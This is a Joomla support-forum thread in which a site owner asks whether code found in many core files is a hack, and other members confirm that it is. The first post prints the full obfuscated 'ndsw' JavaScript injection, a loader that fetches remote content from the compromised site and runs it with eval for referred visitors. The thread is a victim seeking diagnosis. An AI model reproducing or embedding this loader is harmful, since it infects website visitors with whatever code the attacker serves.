mysitesguru says I've been hacked

Discussion regarding Joomla! 3.x security issues.

Moderators: mandville, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Windows Defender SmartScreen Issues <-- please read this if using Windows 10.
Locked
Donethat
Joomla! Explorer
Joomla! Explorer
Posts: 436
Joined: Fri May 30, 2008 12:36 pm
Location: Redhill
Contact:

mysitesguru says I've been hacked

Post by Donethat » Tue Mar 08, 2022 5:06 pm

Apparently my website has been hacked. A lot of core files, and others, have this inserted

ndsw===undefined

Code: Select all

};if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//cavespider.co.uk/components/components.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};
ndsw appears a few times. Is this really a hack? I've come unstuck with tools like this before so before I do anything about it I want to be sure.
Perfection is a state of mind, not reality
www.cavespider.co.uk

gws
Joomla! Champion
Joomla! Champion
Posts: 5951
Joined: Tue Aug 23, 2005 1:56 pm
Location: South coast, UK
Contact:

Re: mysitesguru says I've been hacked

Post by gws » Tue Mar 08, 2022 5:47 pm

When I had a look at your site my anti virus went mad..... JS/Agent.PIV
I would trust Phil Taylor.

User avatar
brian
Joomla! Master
Joomla! Master
Posts: 12787
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:

Re: mysitesguru says I've been hacked

Post by brian » Tue Mar 08, 2022 5:51 pm

If something has been inserted into core files and you didnt do it then of course you have been hacked.
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/

Donethat
Joomla! Explorer
Joomla! Explorer
Posts: 436
Joined: Fri May 30, 2008 12:36 pm
Location: Redhill
Contact:

Re: mysitesguru says I've been hacked

Post by Donethat » Tue Mar 08, 2022 6:23 pm

Ok, the question really is, was it inserted?

It effects a lot of files.
Perfection is a state of mind, not reality
www.cavespider.co.uk

User avatar
brian
Joomla! Master
Joomla! Master
Posts: 12787
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:

Re: mysitesguru says I've been hacked

Post by brian » Tue Mar 08, 2022 6:24 pm

well it will only take you 2 seconds to see if it is there. open the file and look
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/

Donethat
Joomla! Explorer
Joomla! Explorer
Posts: 436
Joined: Fri May 30, 2008 12:36 pm
Location: Redhill
Contact:

Re: mysitesguru says I've been hacked

Post by Donethat » Wed Mar 09, 2022 9:35 am

Hi Brian

Oh it is there, just wanted to know whether it was normally supposed to be there. I have spoken since to one of the developers who assure me this is a common exploit. So I have some work to do it seems.
Perfection is a state of mind, not reality
www.cavespider.co.uk

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44096
Joined: Sat Apr 05, 2008 9:58 pm

Re: mysitesguru says I've been hacked

Post by Webdongle » Wed Mar 09, 2022 9:45 am

http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".


Locked

Return to “Security in Joomla! 3.x”